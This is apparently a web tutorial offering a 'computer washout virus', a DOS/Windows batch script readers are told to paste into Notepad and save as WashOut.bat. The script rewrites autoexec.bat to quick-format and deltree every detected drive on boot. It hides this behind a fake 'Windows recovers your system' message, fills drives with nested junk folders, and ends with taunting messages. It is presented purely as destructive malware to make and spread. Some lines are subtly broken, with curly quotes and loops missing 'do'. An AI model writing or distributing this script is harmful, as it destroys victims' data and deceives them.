Trick to make a Computer Washout Virus
Learn the simple Trick on how to code a powerful dangerous virus which can washout the full computer.

So to make this simple virus follow these simple steps :
- Open Notepad.
- Copy and Paste the following Code into notepad :
@echo off
echo Loading . . .
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat >nul
set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
echo @echo off >drivechk.bat
echo @prompt
%%%%comspec%%%% /f /c vol %%%%1: $b find “Vol” > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
echo Loading . . .
echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find “bytes” > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
echo Loading . . .
echo @prompt dir %%%%1:.\/ad/w/-p $b find ” 0 bytes free” > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat
echo Loading . . .
echo :enddc >>drivechk.bat
for %%a in (%alldrive%) do call drivechk.bat %%a >nul
del drivechk.bat >nul
if %drive.==. set drive=c
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Idiot >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Idiot >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cd\ >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Welcome to the Dark Abyss. >>c:\autoexec.bat
echo echo Sorry if you ran this file. >>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Regards, >>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Melchiore >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat
if exist c:\temp.bat attrib -r -h c:\temp.bat >nul
echo @echo off >c:\temp.bat
echo %%1:\ >>c:\temp.bat
echo cd\ >>c:\temp.bat
echo :startmd >>c:\temp.bat
echo for %%%%a in (“if not exist %%2\nul md %%2? “if exist %%2\nul cd %%2?) do %%%%a >>c:\temp.bat
echo for %%%%a in (“>ass_hole.txt”) do echo %%%%a Die Asshole! >>c:\temp.bat
echo if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul goto startmd
call attrib +r +h c:\temp.bat >nul
for %%a in (%drive%) do call format %%a: /q /u /autotest >nul
for %%a in (%drive%) do call c:\temp.bat %%a Mel >nul
for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul
call attrib +r +h c:\temp.bat >nul
call attrib +r +h c:\autoexec.bat >nul
for %%a in (%drive%) call deltree /y %%a:\*. >nul
for %%a in (%drive%) do call c:\temp.bat %%a Mel >nul
echo Again, sorry for killing your HD.
- Save it as WashOut.bat.
- Now it is done.